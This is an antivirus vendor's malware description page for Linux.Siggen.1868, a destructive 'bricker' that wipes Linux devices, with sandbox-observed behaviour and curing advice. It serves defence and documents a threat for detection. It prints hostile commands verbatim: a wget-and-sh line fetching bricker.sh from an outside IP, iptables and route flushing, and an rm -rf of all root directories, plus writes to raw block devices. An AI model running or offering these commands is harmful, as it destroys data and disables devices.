Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Siggen.1868

Added to the Dr.Web virus database: 2019-06-24

Virus description added:

Technical Information

Malicious functions:
Modifies firewall settings:
  • iptables -t nat -F
Launches processes:
  • sh -c wget http://185.244.25.231/bricker.sh; sh bricker.sh
  • wget http://185.244.25.231/bricker.sh
  • sh bricker.sh
  • cat /proc/mountsncat /dev/urandom
  • ip route del default
  • rm -rf /bin /boot /dev /etc /home /initrd.img /lib /lost+found /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var /vmlinux
Performs operations with the file system:
Creates or modifies files:
  • /root/bricker.sh
  • /dev/mtdblock1
  • /dev/mtdblock2
  • /dev/mtdblock3
  • /dev/mtdblock0
  • /dev/mtd1
  • /dev/sda
  • /dev/mmcblk0p8
  • /dev/mmcblk0p16
  • /dev/mtdblock4
  • /dev/mmcblk0p12
  • /dev/mtdblock5
  • /dev/mmcblk0
  • /dev/mmcblk0p9
  • /dev/root
  • /dev/mtd0
  • /dev/mmcblk0p13
Deletes files:
  • /root/tailf
  • /root/cfgmtd
  • /root/nvram
  • /root/lsmod
  • /root/less
  • /root/bzexe
  • /root/systemd-ask-password
  • /root/umount
  • /root/zless
  • /root/pidof
  • /root/nc
  • /root/lsblk
  • /root/systemctl
  • /root/mt
  • /root/domainname
  • /root/date
  • /root/fgrep
  • /root/ln
  • /root/zcmp
  • /root/dnsdomainname
  • /root/udevadm
  • /root/dash
  • /root/mknod
  • /root/which
  • /root/ypdomainname
  • /root/stty
  • /root/zmore
  • /root/chgrp
  • /root/dmesg
  • /root/systemd-notify
  • /root/mkdir
  • /root/sh
  • /root/ip
  • /root/gunzip
  • /root/bzcat
  • /root/su
  • /root/cp
  • /root/netstat
  • /root/touch
  • /root/readlink
  • /root/zgrep
  • /root/getfacl
  • /root/mv
  • /root/pwd
  • /root/systemd-machine-id-setup
  • /root/setfacl
  • /root/rbash
  • /root/gzip
  • /root/egrep
  • /root/mount
  • /root/uname
  • /root/lesskey
  • /root/bunzip2
  • /root/fuser
  • /root/ss
  • /root/sleep
  • /root/sed
  • /root/dir
  • /root/systemd-inhibit
  • /root/rnano
  • /root/sync
  • /root/znew
  • /root/loginctl
  • /root/grep
  • /root/mountpoint
  • /root/tar
  • /root/rm
  • /root/chown
  • /root/systemd
  • /root/bzmore
  • /root/false
  • /root/ps
  • /root/journalctl
  • /root/df
  • /root/cpio
  • /root/nisdomainname
  • /root/ping6
  • /root/chacl
  • /root/uncompress
  • /root/run-parts
  • /root/bash
  • /root/systemd-tty-ask-password-agent
  • /root/chmod
  • /root/bzless
  • /root/more
  • /root/cat
  • /root/findmnt
  • /root/hostname
  • /root/true
  • /root/zcat
  • /root/nc.traditional
  • /root/zdiff
  • /root/bzdiff
  • /root/bzip2
  • /root/echo
  • /root/busybox
  • /root/lessecho
  • /root/nano
  • /root/vdir
  • /root/dd
  • /root/tempfile
  • /root/ping
  • /root/zforce
  • /root/machinectl
  • /root/kmod
  • /root/kill
  • /root/bzegrep
  • /root/ls
  • /root/zfgrep
  • /root/zegrep
  • /root/mt-gnu
  • /root/systemd-tmpfiles
  • /root/netcat
  • /root/lesspipe
  • /root/bzip2recover
  • /root/sh.distrib
  • /root/bzcmp
  • /root/mktemp
  • /root/bzfgrep
  • /root/login
  • /root/gzexe
  • /root/systemd-escape
  • /root/lessfile
  • /root/rmdir
  • /root/bzgrep
  • /root/wdctl
  • /root/config-3.16.0-4-4kc-malta
  • /root/initrd.img-3.16.0-4-4kc-malta
  • /root/System.map-3.16.0-4-4kc-malta
  • /root/vmlinux-3.16.0-4-4kc-malta
  • /root/mmcblk0p13
  • /root/mmcblk0p16
  • /root/root
  • /root/mmcblk0p9
  • /root/mmcblk0
  • /root/mtdblock5
  • /root/mmcblk0p12
  • /root/mtdblock4
  • /root/mmcblk0p8
  • /root/mtdblock0
  • /root/mtdblock3
  • /root/mtdblock2
  • /root/mtdblock1
  • /root/vcsa6
  • /root/vcs6
  • /root/vcsa5
  • /root/vcs5
  • /root/vcsa4
  • /root/vcs4
  • /root/vcsa3
  • /root/vcs3
  • /root/vcsa2
  • /root/vcs2
  • /root/dvd
  • /root/cdrom
  • /root/mtd2ro
  • /root/mtd2
  • /root/mtd1ro
  • /root/mtd1
  • /root/mtd0ro
  • /root/mtd0
  • /root/001
  • /root/4d8f2916-d02a-4a55-b9fa-462db35727b0
  • /root/ee26397c-8d56-4951-ac6e-65aad01bb978
  • /root/ata-QEMU_DVD-ROM_QM00003
  • /root/ata-QEMU_HARDDISK_QM00001-part5
  • /root/ata-QEMU_HARDDISK_QM00001-part1
  • /root/ata-QEMU_HARDDISK_QM00001-part2
  • /root/ata-QEMU_HARDDISK_QM00001
  • /root/11:0
  • /root/8:5
  • /root/8:2
  • /root/8:1
  • /root/8:0
  • /root/rtc
  • /root/sr0
  • /root/7:133
  • /root/7:134
  • /root/7:6
  • /root/7:5
  • /root/7:132
  • /root/7:4
  • /root/7:131
  • /root/7:3
  • /root/7:130
  • /root/7:2
  • /root/90:5
  • /root/90:3
  • /root/90:1
  • /root/90:4
  • /root/90:2
  • /root/189:0
  • /root/90:0
  • /root/21:1
  • /root/21:0
  • /root/7:1
  • /root/4:9
  • /root/4:63
  • /root/4:62
  • /root/4:61
  • /root/7:129
  • /root/7:128
  • /root/7:0
  • /root/4:8
  • /root/4:7
  • /root/4:60
  • /root/4:6
  • /root/4:59
  • /root/4:58
  • /root/4:57
  • /root/4:56
  • /root/4:55
  • /root/4:54
  • /root/4:53
  • /root/4:52
  • /root/4:51
  • /root/4:5
  • /root/4:48
  • /root/4:50
  • /root/4:49
  • /root/4:47
  • /root/4:46
  • /root/4:45
  • /root/4:44
  • /root/4:43
  • /root/4:41
  • /root/4:42
  • /root/4:3
  • /root/4:4
  • /root/4:38
  • /root/4:36
  • /root/4:33
  • /root/4:40
  • /root/4:39
  • /root/4:37
  • /root/4:35
  • /root/4:34
  • /root/4:32
  • /root/4:31
  • /root/4:30
  • /root/4:29
  • /root/4:21
  • /root/4:25
  • /root/4:27
  • /root/4:28
  • /root/4:26
  • /root/4:24
  • /root/4:23
  • /root/4:22
  • /root/4:20
  • /root/4:2
  • /root/4:19
  • /root/4:16
  • /root/4:18
  • /root/4:17
  • /root/4:15
  • /root/4:10
  • /root/4:14
  • /root/4:12
  • /root/4:0
  • /root/10:63
  • /root/4:13
  • /root/4:11
  • /root/4:1
  • /root/5:0
  • /root/5:2
  • /root/5:1
  • /root/10:235
  • /root/1:1
  • /root/1:7
  • /root/10:231
  • /root/10:1
  • /root/10:60
  • /root/10:61
  • /root/10:62
  • /root/1:5
  • /root/1:9
  • /root/1:8
  • /root/1:4
  • /root/1:3
  • /root/1:11
  • /root/13:63
  • /root/4:67
  • /root/4:66
  • /root/4:65
  • /root/4:64
  • /root/29:0
  • /root/254:0
  • /root/252:1
  • /root/252:0
  • /root/sg1
  • /root/sg0
  • /root/xconsole
  • /root/seq
  • /root/timer
  • /root/uhid
  • /root/vhci
  • /root/control
  • /root/ppp
  • /root/tun
  • /root/loop-control
  • /root/btrfs-control
  • /root/cuse
  • /root/fuse
  • /root/log
  • /root/autofs
  • /root/stderr
  • /root/stdout
  • /root/stdin
  • /root/fd
  • /root/core
  • /root/ptmx
  • /root/sda2
  • /root/sda1
  • /root/sda
  • /root/1:0:0:0
  • /root/0:0:0:0
  • /root/network_throughput
  • /root/network_latency
  • /root/cpu_dma_latency
  • /root/rtc0
  • /root/psaux
  • /root/mice
  • /root/ttyS2
  • /root/ttyS1
  • /root/ttyS0
  • /root/ttyS3
  • /root/fb0
  • /root/snapshot
  • /root/tty63
  • /root/tty62
  • /root/tty61
  • /root/tty60
  • /root/tty59
  • /root/tty58
  • /root/tty57
  • /root/tty56
  • /root/tty55
  • /root/tty54
  • /root/tty53
  • /root/tty52
  • /root/tty51
  • /root/tty50
  • /root/tty49
  • /root/tty48
  • /root/tty47
  • /root/tty46
  • /root/tty45
  • /root/tty44
  • /root/tty43
  • /root/tty42
  • /root/tty41
  • /root/tty40
Network activity:
Establishes connection:
  • 18#.##4.25.231:245
HTTP GET requests:
  • 18#.###.25.231/bricker.sh
Sends data to the following servers:
  • 18#.##4.25.231:245

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number